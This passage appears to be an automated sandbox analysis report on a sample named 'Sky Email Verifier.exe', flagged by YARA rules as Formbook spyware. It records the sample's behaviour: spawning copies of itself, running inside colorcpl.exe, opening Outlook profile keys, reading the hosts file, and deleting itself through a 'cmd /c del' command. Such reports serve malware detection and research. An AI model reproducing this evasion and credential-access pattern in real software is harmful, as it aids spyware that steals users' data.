          Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 7_2_044DB477 7_2_044DB477
          Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 7_2_044C841F 7_2_044C841F
          Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 7_2_04574496 7_2_04574496
          Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 7_2_04581D55 7_2_04581D55
          Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 7_2_04582D07 7_2_04582D07
          Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 7_2_044B0D20 7_2_044B0D20
          Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 7_2_045825DD 7_2_045825DD
          Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 7_2_044CD5E0 7_2_044CD5E0
          Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 7_2_044E2581 7_2_044E2581
          Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 7_2_04572D82 7_2_04572D82
          Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 7_2_0457D616 7_2_0457D616
          Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 7_2_044D6E30 7_2_044D6E30
          Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 7_2_04582EF7 7_2_04582EF7
          Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 7_2_0458DFCE 7_2_0458DFCE
          Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 7_2_04581FF1 7_2_04581FF1
          Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 7_2_04571002 7_2_04571002
          Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 7_2_0458E824 7_2_0458E824
          Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 7_2_044DA830 7_2_044DA830
          Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 7_2_045828EC 7_2_045828EC
          Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 7_2_044CB090 7_2_044CB090
          Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 7_2_044E20A0 7_2_044E20A0
          Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 7_2_045820A8 7_2_045820A8
          Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 7_2_044BF900 7_2_044BF900
          Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 7_2_044D4120 7_2_044D4120
          Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 7_2_044D99BF 7_2_044D99BF
          Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 7_2_044DB236 7_2_044DB236
          Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 7_2_0456FA2B 7_2_0456FA2B
          Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 7_2_04574AEF 7_2_04574AEF
          Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 7_2_045822AE 7_2_045822AE
          Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 7_2_044DAB40 7_2_044DAB40
          Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 7_2_0455CB4F 7_2_0455CB4F
          Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 7_2_044DA309 7_2_044DA309
          Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 7_2_04582B28 7_2_04582B28
          Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 7_2_0457DBD2 7_2_0457DBD2
          Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 7_2_045703DA 7_2_045703DA
          Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 7_2_044EABD8 7_2_044EABD8
          Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 7_2_045623E3 7_2_045623E3
          Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 7_2_044E138B 7_2_044E138B
          Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 7_2_044EEBB0 7_2_044EEBB0
          Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 7_2_02398A3B 7_2_02398A3B
          Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 7_2_02398A40 7_2_02398A40
          Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 7_2_023AC2C1 7_2_023AC2C1
          Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 7_2_023AABE3 7_2_023AABE3
          Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 7_2_023AC740 7_2_023AC740
          Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 7_2_02392FB0 7_2_02392FB0
          Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 7_2_023AB794 7_2_023AB794
          Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 7_2_023AC50F 7_2_023AC50F
          Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 7_2_023ABD05 7_2_023ABD05
          Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 7_2_02392D90 7_2_02392D90
          Source: C:\Users\user\Desktop\Sky Email Verifier.exe | Code function: String function: 0193B150 appears 136 times
          Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: String function: 044BB150 appears 136 times
          Source: unknown | Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6836 -s 996
          Source: Sky Email Verifier.exe | Static PE information: invalid certificate
          Source: Sky Email Verifier.exe, 00000000.00000002.224997676.0000000004D50000.00000002.00000001.sdmp | Binary or memory string: OriginalFilenameKernelbase.dll.muij% vs Sky Email Verifier.exe
          Source: Sky Email Verifier.exe, 00000000.00000002.223552024.00000000037BB000.00000004.00000001.sdmp | Binary or memory string: OriginalFilenameAlienRunPE.dll6 vs Sky Email Verifier.exe
          Source: Sky Email Verifier.exe, 00000000.00000002.222263719.0000000000998000.00000004.00000020.sdmp | Binary or memory string: OriginalFilenameclr.dllT vs Sky Email Verifier.exe
          Source: Sky Email Verifier.exe, 00000002.00000002.249988625.00000000014DA000.00000004.00000020.sdmp | Binary or memory string: OriginalFilenamecolorcpl.exej% vs Sky Email Verifier.exe
          Source: Sky Email Verifier.exe, 00000002.00000002.251021200.0000000001BBF000.00000040.00000001.sdmp | Binary or memory string: OriginalFilenamentdll.dllj% vs Sky Email Verifier.exe
          Source: C:\Windows\SysWOW64\WerFault.exe | Section loaded: sfc.dll
          Source: C:\Windows\SysWOW64\WerFault.exe | Section loaded: phoneinfo.dll
          Source: C:\Windows\SysWOW64\WerFault.exe | Section loaded: ext-ms-win-xblauth-console-l1.dll
          Source: C:\Windows\SysWOW64\WerFault.exe | Section loaded: ext-ms-win-xblauth-console-l1.dll
          Source: 00000002.00000002.249408964.0000000000400000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000002.00000002.249408964.0000000000400000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000002.00000002.250036862.0000000001710000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000002.00000002.250036862.0000000001710000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000007.00000002.470914868.0000000002390000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000007.00000002.470914868.0000000002390000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000002.00000002.250085386.0000000001740000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000002.00000002.250085386.0000000001740000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000000.00000002.223476201.0000000003739000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000000.00000002.223476201.0000000003739000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000007.00000002.472311143.0000000004290000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000007.00000002.472311143.0000000004290000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000000.00000002.223552024.00000000037BB000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000000.00000002.223552024.00000000037BB000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000007.00000002.472153635.0000000004260000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000007.00000002.472153635.0000000004260000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 2.2.Sky Email Verifier.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 2.2.Sky Email Verifier.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 2.2.Sky Email Verifier.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 2.2.Sky Email Verifier.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: Sky Email Verifier.exe | Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
          Source: Sky Email Verifier.exe, 00000000.00000002.222537926.0000000000A25000.00000004.00000020.sdmp | Binary or memory string: inaries\Intermediate\vb\microsoft.visualbasic.build.vbproj_731629843\objr\x86\Microsoft.VisualBasic.pdb
          Source: Sky Email Verifier.exe, 00000000.00000002.222613199.0000000000A67000.00000004.00000020.sdmp | Binary or memory string: f:\binaries\Intermediate\vb\microsoft.visualbasic.build.vbproj_731629843\objr\x86\Microsoft.VisualBasic.pdb
          Source: classification engine | Classification label: mal100.troj.spyw.evad.winEXE@10/4@18/10
          Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6200:120:WilError_01
          Source: C:\Windows\SysWOW64\WerFault.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess6836
          Source: C:\Windows\SysWOW64\WerFault.exe | File created: C:\ProgramData\Microsoft\Windows\WER\Temp\WER98A1.tmp
          Source: Sky Email Verifier.exe | Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
          Source: C:\Users\user\Desktop\Sky Email Verifier.exe | Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
          Source: C:\Windows\SysWOW64\WerFault.exe | Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
          Source: C:\Windows\SysWOW64\WerFault.exe | Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
          Source: C:\Users\user\Desktop\Sky Email Verifier.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
          Source: C:\Users\user\Desktop\Sky Email Verifier.exe | File read: C:\Windows\System32\drivers\etc\hosts
          Source: C:\Users\user\Desktop\Sky Email Verifier.exe | File read: C:\Windows\System32\drivers\etc\hosts
          Source: C:\Windows\explorer.exe | File read: C:\Windows\System32\drivers\etc\hosts
          Source: C:\Windows\explorer.exe | File read: C:\Windows\System32\drivers\etc\hosts
          Source: C:\Windows\SysWOW64\WerFault.exe | File read: C:\Windows\System32\drivers\etc\hosts
          Source: C:\Windows\SysWOW64\WerFault.exe | File read: C:\Windows\System32\drivers\etc\hosts
          Source: Sky Email Verifier.exe | Virustotal: Detection: 46%
          Source: Sky Email Verifier.exe | ReversingLabs: Detection: 31%
          Source: C:\Users\user\Desktop\Sky Email Verifier.exe | File read: C:\Users\user\Desktop\Sky Email Verifier.exe
          Source: unknown | Process created: C:\Users\user\Desktop\Sky Email Verifier.exe 'C:\Users\user\Desktop\Sky Email Verifier.exe'
          Source: unknown | Process created: C:\Users\user\Desktop\Sky Email Verifier.exe C:\Users\user\Desktop\Sky Email Verifier.exe
          Source: unknown | Process created: C:\Users\user\Desktop\Sky Email Verifier.exe C:\Users\user\Desktop\Sky Email Verifier.exe
          Source: unknown | Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6836 -s 996
          Source: unknown | Process created: C:\Windows\SysWOW64\colorcpl.exe C:\Windows\SysWOW64\colorcpl.exe
          Source: unknown | Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\Sky Email Verifier.exe'
          Source: unknown | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\Sky Email Verifier.exe | Process created: C:\Users\user\Desktop\Sky Email Verifier.exe C:\Users\user\Desktop\Sky Email Verifier.exe
          Source: C:\Users\user\Desktop\Sky Email Verifier.exe | Process created: C:\Users\user\Desktop\Sky Email Verifier.exe C:\Users\user\Desktop\Sky Email Verifier.exe
          Source: C:\Windows\SysWOW64\colorcpl.exe | Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\Sky Email Verifier.exe'
          Source: C:\Users\user\Desktop\Sky Email Verifier.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0A29FF9E-7F9C-4437-8B11-F424491E3931}\InprocServer32
          Source: C:\Users\user\Desktop\Sky Email Verifier.exe | File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
          Source: C:\Windows\SysWOW64\colorcpl.exe | Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\
          Source: Sky Email Verifier.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
          Source: Sky Email Verifier.exe | Static PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT, HIGH_ENTROPY_VA
          Source: Binary string: \??\C:\Windows\dll\mscorlib.pdb6U =! source: Sky Email Verifier.exe, 00000000.00000002.222365799.00000000009CE000.00000004.00000020.sdmp
          Source: Binary string: C:\Windows\mscorlib.pdbpdblib.pdb source: Sky Email Verifier.exe, 00000000.00000002.222537926.0000000000A25000